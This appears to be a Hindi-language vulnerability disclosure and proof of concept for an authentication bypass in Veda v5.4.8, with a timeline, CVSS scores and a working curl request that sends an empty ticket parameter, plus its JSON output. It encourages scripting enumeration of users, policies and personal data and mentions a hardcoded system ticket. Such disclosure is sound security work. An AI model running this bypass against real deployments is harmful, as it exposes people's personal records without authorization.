
CVE-2025-66698 के लिए अवधारणा का प्रमाण: खाली टिकट पैरामीटर के माध्यम से Veda v5.4.8 में प्रमाणीकरण बायपास, जो अप्रमाणित API एंडपॉइंट के माध्यम से उपयोगकर्ताओं, नीतियों और PII की गणना को सक्षम बनाता है।
लक्ष्य सॉफ्टवेयर: Veda (Semantic Machines) v5.4.8 (संभवतः सभी पिछले संस्करण)। भेद्यता प्रकार: प्रमाणीकरण बायपास। CVE आईडी: CVE-2025-66698। सारांश: सिस्टम टिकट पैरामीटर का अनुचित रूप से सत्यापन करता है, एक खाली स्ट्रिंग को वैध सत्र के रूप में मानता है। प्रोजेक्ट लिंक: Veda (Semantic Machines)
18 नवंबर 2025: खोज और प्रारंभिक CVE अनुरोध। 9 जनवरी 2026: CVE आईडी निर्धारित किया गया। विक्रेता से संपर्क करने का प्रयास किया गया (अनदेखा किया गया और हटा दिया गया)। 13 जनवरी 2026: विक्रेता की प्रतिक्रिया की कमी के कारण सार्वजनिक खुलासा।
यह भेद्यता मेरे सुरक्षा अनुसंधान के दौरान कोड की समीक्षा करते समय पाई गई। कोड में टिकट पैरामीटर खाली मान की जाँच नहीं करता है।
कुछ प्रभावित API एंडपॉइंट:
वहाँ कई डिफ़ॉल्ट उपयोगकर्ता हैं जिन्हें आप एनुम कर सकते हैं, और आप स्कीम बदल सकते हैं: cfg से v-s और आदि ताकि उपयोगकर्ताओं, नीतियों, PII (पूर्ण नाम, फोटोग्राफ, नौकरी के शीर्षक, जन्म तिथियाँ, और संपर्क जानकारी) आदि को एनुम किया जा सके।
curl "https://localhost/get_individual?ticket=&uri=cfg:VedaSystem" -k
{"@":"cfg:VedaSystem","rdf:type":[{"data":"v-s:Person","type":"Uri"}],"rdfs:isDefinedBy":[{"data":"http://semantic-machines.com/veda/system-account","type":"Uri"}],"rdfs:label":[{"data":"Система .","lang":"RU","type":"String"},{"data":"System .","lang":"EN","type":"String"}],"v-s:actualVersion":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:author":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:birthday":[{"data":"2014-03-04T20:00:00Z","type":"Datetime"}],"v-s:created":[{"data":"2025-11-18T14:49:45Z","type":"Datetime"}],"v-s:creator":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:defaultAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:edited":[{"data":"2025-11-18T17:08:59Z","type":"Datetime"}],"v-s:hasAccount":[{"data":"cfg:VedaSystemAccount","type":"Uri"}],"v-s:hasAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:hasAspect":[{"data":"cfg:VedaSystem_aspect","type":"Uri"}],"v-s:hasImage":[{"data":"v-s:DefaultPhoto","type":"Uri"}],"v-s:lastEditor":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:lastName":[{"data":"Система","lang":"RU","type":"String"},{"data":"System","lang":"EN","type":"String"}],"v-s:parentOrganization":[{"data":"cfg:org_Veda","type":"Uri"}],"v-s:updateCounter":[{"data":93,"type":"Integer"}],"v-ui:hasPreferences":[{"data":"cfg:VedaSystem_pref","type":"Uri"}]}
आपको बस यह करना है कि इन एंटिटीज "xxx:xxx" (cfg:xxx, v-s:xxx और आदि) को अधिक से अधिक खोजें। आप इसके लिए एक सरल bash स्क्रिप्ट लिख सकते हैं। इसी परिणाम को प्राप्त करने के लिए एक हार्डकोडेड systicket भी है।
CVSS मूल्यांकन:
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N स्कोर: 8.6 (उच्च)AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N स्कोर: 9.3 (गंभीर)